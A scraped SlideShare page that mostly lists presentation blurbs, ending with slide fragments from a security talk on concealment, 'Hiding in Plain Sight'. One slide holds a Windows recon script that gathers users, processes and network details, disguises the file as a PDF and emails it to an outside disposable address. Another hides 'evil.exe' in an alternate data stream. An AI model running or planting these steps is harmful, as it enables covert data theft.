Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift
Overview
Dive into the world of anomaly detection on edge devices with our comprehensive hands-on tutorial. This SlideShare presentation will guide you through the entire process, from data collection and model training to edge deployment and real-time monitoring. Perfect for those looking to implement robust anomaly detection systems on resource-constrained IoT/edge devices.
Key Topics Covered
1. Introduction to Anomaly Detection
- Understand the fundamentals of anomaly detection and its importance in identifying unusual behavior or failures in systems.
2. Understanding Edge (IoT)
- Learn about edge computing and IoT, and how they enable real-time data processing and decision-making at the source.
3. What is ArgoCD?
- Discover ArgoCD, a declarative, GitOps continuous delivery tool for Kubernetes, and its role in deploying applications on edge devices.
4. Deployment Using ArgoCD for Edge Devices
- Step-by-step guide on deploying anomaly detection models on edge devices using ArgoCD.
5. Introduction to Apache Kafka and S3
- Explore Apache Kafka for real-time data streaming and Amazon S3 for scalable storage solutions.
6. Viewing Kafka Messages in the Data Lake
- Learn how to view and analyze Kafka messages stored in a data lake for better insights.
7. What is Prometheus?
- Get to know Prometheus, an open-source monitoring and alerting toolkit, and its application in monitoring edge devices.
8. Monitoring Application Metrics with Prometheus
- Detailed instructions on setting up Prometheus to monitor the performance and health of your anomaly detection system.
9. What is Camel K?
- Introduction to Camel K, a lightweight integration framework built on Apache Camel, designed for Kubernetes.
10. Configuring Camel K Integrations for Data Pipelines
- Learn how to configure Camel K for seamless data pipeline integrations in your anomaly detection workflow.
11. What is a Jupyter Notebook?
- Overview of Jupyter Notebooks, an open-source web application for creating and sharing documents with live code, equations, visualizations, and narrative text.
12. Jupyter Notebooks with Code Examples
- Hands-on examples and code snippets in Jupyter Notebooks to help you implement and test anomaly detection models.
dbms calicut university B. sc Cs 4th sem.pdf
Its a seminar ppt on database management system using sql
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Simplify your search for a reliable Python development partner! This list presents the top 10 trusted US providers offering comprehensive Python development services, ensuring your project's success from conception to completion.
Skybuffer SAM4U tool for SAP license adoption
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
Finale of the Year: Apply for Next One!
Presentation for the event called "Finale of the Year: Apply for Next One!" organized by GDSC PJATK
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
Artificial Intelligence for XMLDevelopment
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
Presentation of the OECD Artificial Intelligence Review of Germany
Consult the full report at https://www.oecd.org/digital/oecd-artificial-intelligence-review-of-germany-609808d6-en.htm
Trusted Execution Environment for Decentralized Process Mining
Presentation of the paper "Trusted Execution Environment for Decentralized Process Mining" given during the CAiSE 2024 Conference in Cyprus on June 7, 2024.
TrustArc Webinar - 2024 Global Privacy Survey
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
Predictive maintenance is a proactive approach that anticipates equipment failures before they happen. At the forefront of this innovative strategy is Artificial Intelligence (AI), which brings unprecedented precision and efficiency. AI in predictive maintenance is transforming industries by reducing downtime, minimizing costs, and enhancing productivity.
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Digital Marketing Trends in 2024 | Guide for Staying Ahead
https://www.wask.co/ebooks/digital-marketing-trends-in-2024
Feeling lost in the digital marketing whirlwind of 2024? Technology is changing, consumer habits are evolving, and staying ahead of the curve feels like a never-ending pursuit. This e-book is your compass. Dive into actionable insights to handle the complexities of modern marketing. From hyper-personalization to the power of user-generated content, learn how to build long-term relationships with your audience and unlock the secrets to success in the ever-shifting digital landscape.
A Comprehensive Guide to DeFi Development Services in 2024
DeFi represents a paradigm shift in the financial industry. Instead of relying on traditional, centralized institutions like banks, DeFi leverages blockchain technology to create a decentralized network of financial services. This means that financial transactions can occur directly between parties, without intermediaries, using smart contracts on platforms like Ethereum.
In 2024, we are witnessing an explosion of new DeFi projects and protocols, each pushing the boundaries of what’s possible in finance.
In summary, DeFi in 2024 is not just a trend; it’s a revolution that democratizes finance, enhances security and transparency, and fosters continuous innovation. As we proceed through this presentation, we'll explore the various components and services of DeFi in detail, shedding light on how they are transforming the financial landscape.
At Intelisync, we specialize in providing comprehensive DeFi development services tailored to meet the unique needs of our clients. From smart contract development to dApp creation and security audits, we ensure that your DeFi project is built with innovation, security, and scalability in mind. Trust Intelisync to guide you through the intricate landscape of decentralized finance and unlock the full potential of blockchain technology.
Ready to take your DeFi project to the next level? Partner with Intelisync for expert DeFi development services today!
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
June Patch Tuesday
Ivanti’s Patch Tuesday breakdown goes beyond patching your applications and brings you the intelligence and guidance needed to prioritize where to focus your attention first. Catch early analysis on our Ivanti blog, then join industry expert Chris Goettl for the Patch Tuesday Webinar Event. There we’ll do a deep dive into each of the bulletins and give guidance on the risks associated with the newly-identified vulnerabilities.
Building Production Ready Search Pipelines with Spark and Milvus
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
Recently uploaded (20)
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
Trusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process Mining
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
Digital Marketing Trends in 2024 | Guide for Staying Ahead
Digital Marketing Trends in 2024 | Guide for Staying Ahead
A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
CodeStock14: Hiding in Plain Sight
- 1. HidinginPlainSight Presentedby /RobGillen @argodev Thisworkislicensedundera . Thistalkandrelatedresourcesareavailableonline: CreativeCommonsAttribution4.0InternationalLicense https://github.com/argodev/talks/
- 10. EncryptionExample Aboveconfigurationiscustom-hardwareresistant Takesapproximately¼secondperguess
- 15. CommandText ipconfig /all > %APPDATA%info.txt net start >> %APPDATA%info.txt tasklist /v >> %APPDATA%info.txt net user >> %APPDATA%info.txt net localgroup administrators >> %APPDATA%info.txt netstat -ano >> %APPDATA%info.txt net use >> %APPDATA%info.txt copy %APPDATA%info.txt %APPDATA%output.pdf del %APPDATA%info.txt sendmail %APPDATA%output.pdf Status Update “Jones, William E. wejones@yourorg.gov” itebaffe-836@yopmail.com smtp.yourorg.gov del %APPDATA%output.pdf
- 27. AlternateDataStreams FeatureofNTFSsinceNT3.5.1 Usedformetadataandcompatibilitywithotherfilesystems
- 29. Whataboutthis? #type evil.exe > notepad.exe:evil.exe #start notepad.exe:evil.exe
- 31. LSB:HowItWorks
- 35. LSBBlowUp